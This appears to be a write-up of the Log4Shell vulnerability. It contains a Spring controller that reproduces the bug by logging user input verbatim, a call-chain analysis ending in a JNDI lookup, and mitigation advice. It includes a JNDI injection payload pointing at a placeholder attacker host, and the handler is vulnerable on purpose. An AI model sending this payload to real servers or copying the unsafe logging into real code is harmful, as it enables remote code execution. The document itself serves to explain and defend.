Log4j2 vulnerability (Log4Shell, CVE-2021-44228)
https://zhuanlan.zhihu.com/p/443575682
Reproduction code. The handler below logs the username field of a POSTed JSON body verbatim, so a request to /test/msg with a body such as {"username":"${jndi:ldap://attacker-host/x}"} (placeholder host) delivers the string straight into Log4j's message formatting.
import lombok.extern.slf4j.Slf4j;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

/**
 * @author xiaobai
 */
@RequestMapping("/test")
@RestController
@Slf4j
public class TestController {
    // SLF4J logger backed by Log4j2 (log4j-slf4j-impl), so the message passes through
    // Log4j's MessagePatternConverter and its ${...} lookup substitution.
    private static Logger getLoggerName() {
        return LoggerFactory.getLogger("userMetadataTo");
    }

    /**
     * testMsgSend
     *
     * @param user user
     * @return ResponseEntity
     */
    @PostMapping("/msg")
    public ResponseEntity<Void> testMsgSend(@RequestBody User user) {
        Logger logger = getLoggerName();
        // Attacker-controlled input is logged as-is: a username of the form
        // ${jndi:ldap://...} reaches Log4j's lookup resolution.
        logger.info(user.getUsername());
        return ResponseEntity.ok().build();
    }

    // Request body shape assumed from the handler; the original page does not show this class.
    public static class User {
        private String username;
        public String getUsername() { return username; }
        public void setUsername(String username) { this.username = username; }
    }
}
Vulnerable code
The branch in question is the noLookups check in MessagePatternConverter.format(). When -Dlog4j2.formatMsgNoLookups is not set, noLookups is false, so the check is passed and any formatted message containing "${" is handed to config.getStrSubstitutor().replace().
Following the call chain: StrSubstitutor resolves each ${...} variable through Interpolator, which dispatches on the prefix; the "jndi" prefix goes to JndiLookup.lookup(), which ends in JndiManager.lookup(), i.e. an InitialContext.lookup() on the attacker-supplied LDAP URL. That is where the server connects out and can fetch a remote object, which is what turns a logged string into code execution.
Temporary mitigation
Set -Dlog4j2.formatMsgNoLookups=true (or the equivalent environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true). Two caveats: the property only exists in Log4j 2.10 and later, and it only disables lookups in the message itself; lookups elsewhere in the configuration, for example a ${ctx:...} in a pattern layout, still run, which is why the Log4j project later withdrew this flag as a sufficient mitigation (CVE-2021-45046). The real fix is to upgrade log4j-core to a patched release; if that cannot be done immediately, removing the lookup class from the jar (zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class) closes this path regardless of version.